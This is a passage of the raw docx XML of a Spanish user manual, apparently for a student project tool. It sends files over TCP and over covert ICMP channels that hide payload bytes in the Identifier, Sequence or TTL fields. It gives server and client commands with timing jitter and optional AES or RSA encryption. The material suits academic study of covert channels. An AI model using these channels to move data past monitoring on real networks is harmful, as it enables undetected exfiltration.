            <w:r>
              <w:t>Interfaz Npcap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre paquetes (recomendado &gt;= 50 ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 3 — Socket TCP con prefijo de longitud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Canal TCP convencional: el emisor abre una conexión TCP normal y envía los datos precedidos de su longitud. No requiere Npcap ni privilegios de Administrador. Es el método más fiable para payloads grandes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXTCP3 --canal TCP --metodo 3 --host 0.0.0.0 --puerto 9000 --cifrado NINGUNO --out-file ./test/tcp/out_tcp3.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal TCP --metodo 3 --host 192.168.1.34 --puerto 9000 --transfer-id RXTCP3 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt</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receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto TCP de destino.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--fragment-size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Tamaño de fragmento en bytes. Por defecto 1024.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre fragmentos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.7 ICMP (canales encubiertos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Todos los métodos ICMP usan Scapy y requieren Npcap y privilegios de Administrador en ambas máquinas. El servidor debe tener habilitada la regla de firewall ICMP (ver sección 2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 1 — Campo Identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada byte del payload se envía en el campo Identifier de un paquete ICMP Echo Request. El receptor captura los Echo Request entrantes y extrae el campo identifier para reconstruir el payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXICMP1 --canal ICMP --metodo 1 --host 0.0.0.0 --cifrado NINGUNO --out-file ./test/icmp/out_icmp1.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal ICMP --metodo 1 --host 192.168.1.34 --transfer-id RXICMP1 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt --ritmo-base-ms 50 --ritmo-dispersion-ms 20</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receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interfaz Npcap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre paquetes (recomendado &gt;= 50 ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 2 — Campo Sequence Number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Igual que ICMP/1 pero el byte se codifica en el campo Sequence Number del ICMP Echo Request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXICMP2 --canal ICMP --metodo 2 --host 0.0.0.0 --cifrado NINGUNO --out-file ./test/icmp/out_icmp2.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal ICMP --metodo 2 --host 192.168.1.34 --transfer-id RXICMP2 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt --ritmo-base-ms 50 --ritmo-dispersion-ms 20</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receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interfaz Npcap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre paquetes (recomendado &gt;= 50 ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 3 — Campo TTL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada byte del payload se codifica en el campo TTL del paquete IP que contiene el ICMP Echo Request (TTL = TTL_BASE + byte, TTL_BASE por defecto 0). El receptor mide el TTL de los paquetes entrantes y resta la base para recuperar el byte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXICMP3 --canal ICMP --metodo 3 --host 0.0.0.0 --cifrado NINGUNO --out-file ./test/icmp/out_icmp3.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal ICMP --metodo 3 --host 192.168.1.34 --transfer-id RXICMP3 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt --ritmo-base-ms 50 --ritmo-dispersion-ms 20</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Parámetro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Obligatorio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP del receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ttl-base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Valor base del TTL. Por defecto 0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interfaz Npcap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre paquetes (recomendado &gt;= 50 ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>6. Uso del cifrado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El cifrado es transparente al canal: se puede combinar cualquier esquema con cualquier protocolo. Los parámetros de cifrado se añaden tanto al send como al receive. El nonce (y la clave de sesión en asimétrico) viajan incrustados al inicio del stream: no se necesita ningún fichero adicional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>6.1 Cifrado simétrico (AES-GCM 256 bits)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ambas máquinas necesitan el mismo fichero clave.key. Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXSIM1 --canal TCP --metodo 3 --host 0.0.0.0 --puerto 9000 --cifrado SIMETRICO --algoritmo AESGCM --clave-privada C:/TFG-REPO/claves/simetrico/clave.key --out-file ./test/out_sim1.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal TCP --metodo 3 --host 192.168.1.34 --puerto 9000 --transfer-id RXSIM1 --cifrado SIMETRICO --algoritmo AESGCM --clave-privada C:/TFG-REPO/claves/simetrico/clave.key --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>6.2 Cifrado asimétrico (RSA-OAEP + AES-GCM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El emisor usa la clave pública. El receptor usa la clave privada. Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXASIM1 --canal TCP --metodo 3 --host 0.0.0.0 --puerto 9000 --cifrado ASIMETRICO --algoritmo RSA_OAEP --clave-privada C:/TFG-REPO/claves/asimetrico/privada.pem --out-file ./test/out_asim1.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal TCP --metodo 3 --host 192.168.1.34 --puerto 9000 --transfer-id RXASIM1 --cifrado ASIMETRICO --algoritmo RSA_OAEP --clave-publica C:/TFG-REPO/claves/asimetrico/publica.pem --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt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